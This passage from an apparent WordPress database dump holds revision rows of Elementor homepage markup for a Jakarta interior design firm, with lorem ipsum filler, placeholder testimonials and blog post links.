& designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-05-25 10:30:59','2023-05-25 10:30:59','',22,'https://bauhaus.futuremediatrix.com/?p=4766',0,'revision','',0),(4767,2,'2023-05-25 10:34:17','2023-05-25 10:34:17','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n	        				<h4>\n					Home Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n	        				<h4>\n					Commercial Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-05-25 10:34:17','2023-05-25 10:34:17','',22,'https://bauhaus.futuremediatrix.com/?p=4767',0,'revision','',0),(4768,2,'2023-05-25 10:34:17','2023-05-25 10:34:17','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n	        				<h4>\n					Home Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n	        				<h4>\n					Commercial Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design 